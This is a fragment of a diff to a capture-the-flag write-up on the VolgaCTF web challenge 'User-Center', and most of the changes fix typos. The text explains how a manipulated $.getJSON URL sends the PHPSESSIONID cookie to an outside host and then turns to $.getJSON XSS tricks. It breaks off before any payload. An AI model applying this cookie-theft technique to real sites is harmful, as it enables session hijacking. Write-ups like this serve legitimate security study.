TeamUnderdawgs/CTF-Docs/VolgaCTF/Web/User-Center.md

 $.getJSON(`//${api}.volga-ctf.ru/user?guid=${guid}`
 ```

-loaded will do request on `shoebpatel.com/?volga-ctf.ru/user?guid=${guid}` which will give cookies which was being originally sent to api.volga-ctf.ru (PHPSESSIONID) Only.
+If loaded will do request on `shoebpatel.com/?volga-ctf.ru/user?guid=${guid}` which will give cookies which was being originally sent to api.volga-ctf.ru (PHPSESSIONID) Only.
 We have PHP cookie but we yet dont have Flag cookie :( .

-4. So this was a ust google search for `$.getJSON XSS` step!
+4. So next step was just a simple google search for `$.getJSON XSS` step!
 We needed to read and find about XSS ways in getJSON !

 5. It was damn easy, If the URL to $.getJSON contains `?` anywhere in the following format, Examples: